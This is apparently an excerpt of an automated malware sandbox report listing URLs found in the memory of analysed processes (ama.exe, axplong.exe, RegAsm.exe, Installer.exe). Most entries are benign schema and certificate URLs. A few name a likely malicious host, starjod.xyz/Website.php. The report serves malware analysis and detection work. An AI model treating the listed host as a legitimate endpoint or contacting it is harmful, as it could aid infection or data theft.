Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: svchost.exe, 0000001D.00000003.4214845462.0000018F5C25E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: ama.exe, 00000004.00000002.2407925819.0000000008802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215109387.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216975431.0000018F5BD65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215476990.0000018F5BD45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215547956.0000018F5BD49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215441329.0000018F5BD42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215622223.0000018F5BD4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215584512.0000018F5BD4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215039299.0000018F5BD41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217012384.0000018F5BD4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000001D.00000003.2392183512.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215109387.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2413502539.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338379077.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2379044640.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216975431.0000018F5BD65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392083358.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392227835.0000018F5BD7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2391853116.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2413854316.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2413916478.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2379195931.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214964149.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392307912.0000018F5BD53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2324863832.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215109387.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338379077.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216975431.0000018F5BD65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217052662.0000018F5BD7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215109387.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2338379077.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216975431.0000018F5BD65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215441329.0000018F5BD42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352040528.0000018F5BD0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2413945250.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215039299.0000018F5BD41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216902340.0000018F5BD43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352369386.0000018F5BD96000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352369386.0000018F5BD9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue02
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221491538.0000018F5B4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: Installer.exe, 0000000D.00000003.2200485500.00000266EC1F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://starjod.xyz/Website.php
Source: ama.exe, 00000004.00000002.2393678580.00000000028E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://starjod.xyz/Website.phpt-
Source: ama.exe, 00000004.00000002.2403128671.0000000005975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://starjod.xyz/Website.phpxj
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: ama.exe, 00000004.00000002.2393678580.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
